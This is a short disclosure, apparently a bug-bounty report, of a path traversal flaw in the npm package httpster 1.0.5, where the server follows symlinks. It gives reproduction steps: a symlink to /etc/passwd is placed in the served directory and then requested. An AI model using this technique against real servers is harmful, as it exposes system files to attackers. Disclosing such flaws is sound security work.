Path Traversal in simbco/httpster
Aug 14th 2020
I would like to report a Path Traversal vulnerability in the httpster module. It allows an attacker to read system files: with a symbolically linked file in the working directory, the server follows the link and it is possible to read arbitrary files outside of the web root directory.
Module name: httpster
Version: 1.0.5 (latest)
Simple http server for quick loading of content.
Install the httpster module
$ npm -g install httpster
Make a directory
$ mkdir test
Go to 'test' directory
$ cd test
Create a symlink file
$ ln -s /etc/passwd 'filename'
Run httpster module
Request 'filename' in the browser; the response is the contents of /etc/passwd.
This could have enabled an attacker to view system files and leverage them for further attacks such as remote code execution.